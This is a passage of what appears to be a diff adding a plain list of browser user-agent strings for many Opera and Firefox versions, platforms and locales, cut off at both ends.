U; ru) Presto/2.1.1 +Opera/9.63 (X11; Linux x86_64; U; cs) Presto/2.1.1 +Opera/9.63 (X11; Linux x86_64; U; ru) Presto/2.1.1 +Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1 +Opera/9.64 (Windows NT 6.0; U; pl) Presto/2.1.1 +Opera/9.64 (Windows NT 6.0; U; zh-cn) Presto/2.1.1 +Opera/9.64 (Windows NT 6.1; U; de) Presto/2.1.1 +Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; da) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; de) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; en) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; Linux Mint; it) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; nb) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; pl) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; sv) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; tr) Presto/2.1.1 +Opera/9.64 (X11; Linux x86_64; U; cs) Presto/2.1.1 +Opera/9.64 (X11; Linux x86_64; U; de) Presto/2.1.1 +Opera/9.64 (X11; Linux x86_64; U; en-GB) Presto/2.1.1 +Opera/9.64 (X11; Linux x86_64; U; en) Presto/2.1.1 +Opera/9.64 (X11; Linux x86_64; U; hr) Presto/2.1.1 +Opera/9.64 (X11; Linux x86_64; U; pl) Presto/2.1.1 +Opera 9.7 (Windows NT 5.2; U; en) +Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15 +Opera/9.80 (Linux i686; U; en) Presto/2.5.22 Version/10.51 +Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52 +Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 +Opera/9.80 (Macintosh; Intel Mac OS X; U; nl) Presto/2.6.30 Version/10.61 +Opera/9.80 (S60; SymbOS; Opera Tablet/9174; U; en) Presto/2.7.81 Version/10.5 +Opera/9.80 (Windows 98; U; de) Presto/2.6.30 Version/10.61 +Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.10 +Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 5.1; U; de) Presto/2.2.15 Version/10.10 +Opera/9.80 (Windows NT 5.1; U; en) Presto/2.9.168 Version/11.51 +Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00 +Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.62 Version/11.00 +Opera/9.80 (Windows NT 5.1; U; MRA 5.6 (build 03278); ru) Presto/2.6.30 Version/10.63 +Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.6.30 Version/10.62 +Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.50 +Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00 +Opera/9.80 (Windows NT 5.1; U; sk) Presto/2.5.22 Version/10.50 +Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00 +Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10 +Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 5.2; U; en) Presto/2.6.30 Version/10.63 +Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51 +Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.6.30 Version/10.61 +Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.6.30 Version/10.63 +Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 +Opera/9.80 (Windows NT 6.0; U; cs) Presto/2.5.22 Version/10.51 +Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10 +Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00 +Opera/9.80 (Windows NT 6.0; U; en) Presto/2.8.99 Version/11.10 +Opera/9.80 (Windows NT 6.0; U; Gecko/20100115; pl) Presto/2.2.15 Version/10.10 +Opera/9.80 (Windows NT 6.0; U; it) Presto/2.6.30 Version/10.61 +Opera/9.80 (Windows NT 6.0; U; nl) Presto/2.6.30 Version/10.60 +Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.10.229 Version/11.62 +Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.0; U; zh-cn) Presto/2.5.22 Version/10.50 +Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1 +Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.10 +Opera/9.80 (Windows NT 6.1; U; en-GB) Presto/2.7.62 Version/11.00 +Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51 +Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61 +Opera/9.80 (Windows NT 6.1; U; en-US) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00 +Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.7.62 Version/11.00 +Opera/9.80 (Windows NT 6.1; U; fr) Presto/2.5.24 Version/10.52 +Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.5.22 Version/10.50 +Opera/9.80 (Windows NT 6.1; U; ko) Presto/2.7.62 Version/11.00 +Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.6.31 Version/10.70 +Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00 +Opera/9.80 (Windows NT 6.1; U; sk) Presto/2.6.22 Version/10.50 +Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00 +Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50 +Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.30 Version/10.61 +Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00 +Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.5.22 Version/10.50 +Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.1; WOW64; U; pt) Presto/2.10.229 Version/11.62 +Opera/9.80 (Windows NT 6.1 x64; U; en) Presto/2.7.62 Version/11.00 +Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16 +Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.5.24 Version/10.53 +Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60 +Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.6.30 Version/10.61 +Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11 +Opera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01 +Opera/9.80 (X11; Linux i686; U; hu) Presto/2.9.168 Version/11.50 +Opera/9.80 (X11; Linux i686; U; it) Presto/2.5.24 Version/10.54 +Opera/9.80 (X11; Linux i686; U; it) Presto/2.7.62 Version/11.00 +Opera/9.80 (X11; Linux i686; U; ja) Presto/2.7.62 Version/11.01 +Opera/9.80 (X11; Linux i686; U; nb) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux i686; U; pl) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61 +Opera/9.80 (X11; Linux i686; U; pt-BR) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11 +Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10 +Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01 +Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.2.15 Version/10.00 +Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9.168 Version/11.50 +Opera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10 +Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00 +Opera/9.80 (X11; Linux x86_64; U; Ubuntu/10.10 (maverick); pl) Presto/2.7.62 Version/11.01 +Opera/9.80 (X11; U; Linux i686; en-US; rv:1.9.2.3) Presto/2.2.15 Version/10.10 +Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9 +Opera/9.99 (X11; U; sk) +Opera/10.50 (Windows NT 6.1; U; en-GB) Presto/2.2.2 +Opera/10.60 (Windows NT 5.1; U; en-US) Presto/2.6.30 Version/10.60 +Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60 +Opera/12.0(Windows NT 5.1;U;en)Presto/22.9.168 Version/12.00 +Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00 +Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02 + +# Mozilla Firefox + +Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8) +Mozilla/4.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/2010324480 Firefox/3.5.4 +Mozilla/4.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.7) Gecko/2008398325 Firefox/3.1.4 +Mozilla/5.0 (compatible; Windows; U; Windows NT 6.2; WOW64; en-US; rv:12.0) Gecko/20120403211507 Firefox/12.0 +Mozilla/5.0 (Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 +Mozilla/5.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0a2) Gecko/20111101 Firefox/9.0a2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 +Mozilla/5.0 (Macintosh; I; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1 +Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 +Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009122115 Firefox/3.0.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20090204 Firefox/3.1b3pre +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; it; rv:1.9.2.22) Gecko/20110902 Firefox/3.6.22 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; it; rv:1.9b4) Gecko/2008030317 Firefox/3.0b4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 FBSMTWB +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 GTB5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20091218 Firefox 3.6b5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.23) Gecko/20110920 Firefox/3.6.23 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; he; rv:1.9.1b4pre) Gecko/20100405 Firefox/3.6.3plugin1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de-AT; rv:1.9.1.8) Gecko/20100625 Firefox/3.6.6 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.12pre) Gecko/20080122 Firefox/2.0.0.12pre +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.13) Gecko/20080313 Firefox +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9.2.19) Gecko/20110707 Firefox/3.6.19 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.4) Gecko/20081029 Firefox/2.0.0.18 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.2.22) Gecko/20110902 Firefox/3.6.22 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.4 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1b1) Gecko/20060707 Firefox/2.0b1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1b1) Gecko/20061110 Firefox/2.0b3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20060320 Firefox/2.0a1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20060322 Firefox/2.0a1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; es-ES; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; rv:1.7.3) Gecko/20040913 Firefox/0.10 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; rv:1.8.1.16) Gecko/20080702 Firefox +Mozilla/5.0 (Microsoft Windows NT 6.2.9200.0); rv:22.0) Gecko/20130405 Firefox/22.0 +Mozilla/5.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Firefox/3.6.13 +Mozilla/5.0 (U; Windows NT 5.1; en-GB; rv:1.8.1.17) Gecko/20080808 Firefox/2.0.0.17 +Mozilla/5.0 (Windows 98; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 +Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 5.0; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0 +Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 +Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 +Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20120405 Firefox/14.0a1 +Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/13.0.1 +Mozilla/5.0 (Windows NT 5.1; rv:1.9a1) Gecko/20060217 Firefox/1.6a1 +Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 5.1; rv:2.0b13pre) Gecko/20110223 Firefox/4.0b13pre +Mozilla/5.0 (Windows NT 5.1; rv:2.0b8pre) Gecko/20101127 Firefox/4.0b8pre +Mozilla/5.0 (Windows NT 5.1; rv:2.0b9pre) Gecko/20110105 Firefox/4.0b9pre +Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0 +Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0 +Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0 +Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0 FirePHP/0.6 +Mozilla/5.0 (Windows NT 5.1; rv:8.0; en_us) Gecko/20100101 Firefox/8.0 +Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 +Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 +Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 5.1; U; tr; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 +Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20091102 Firefox/3.5.5 +Mozilla/5.0 (Windows NT 5.2; rv:2.0b13pre) Gecko/20110304 Firefox/4.0b13pre +Mozilla/5.0 (Windows NT 5.2; U; de; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 +Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (Windows NT 6.0; U; hu; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 +Mozilla/5.0 (Windows NT 6.0; U; sv; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 +Mozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 +Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 +Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 6.1; de;rv:12.0) Gecko/20120403211507 Firefox/12.0 +Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 +Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/14.0.1 +Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/ 20120405 Firefox/14.0.1 +Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/18.0.1 +Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20120405 Firefox/14.0a1 +Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2 +Mozilla/5.0 (Windows NT 6.1; rv:1.9) Gecko/20100101 Firefox/4.0 +Mozilla/5.0 (Windows NT 6.1; rv:2.0b10) Gecko/20110126 Firefox/4.0b10 +Mozilla/5.0 (Windows NT 6.1; rv:2.0b10pre) Gecko/20110113 Firefox/4.0b10pre +Mozilla/5.0 (Windows NT 6.1; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre +Mozilla/5.0 (Windows NT 6.1; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre Firefox/4.0b6pre +Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre +Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20110319 Firefox/4.0 +Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0 +Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3 +Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/19.0 +Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/7.0 +Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 +Mozilla/5.0 (Windows NT 6.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 +Mozilla/5.0 (Windows NT 6.1; U; ru; rv:5.0.1.6) Gecko/20110501 Firefox/5.0.1 Firefox/5.0.1 +Mozilla/5.0 (Windows NT 6.1; U;WOW64; de;rv:11.0) Gecko Firefox/11.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:14.0) Gecko/20120405 Firefox/14.0a1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b10pre) Gecko/20110118 Firefox/4.0b10pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110129 Firefox/4.0b11pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110131 Firefox/4.0b11pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101128 Firefox/4.0b8pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110208 Firefox/4.2a1pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110323 Firefox/4.2a1pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:23.0) Gecko/20131011 Firefox/23.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko Firefox/11.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130330 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 +Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130326 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0 +Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/23.0 +Mozilla/5.0 (Windows NT 6.2; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 +Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1 +Mozilla/5.0 (Windows NT 6.2; Win64; x64; 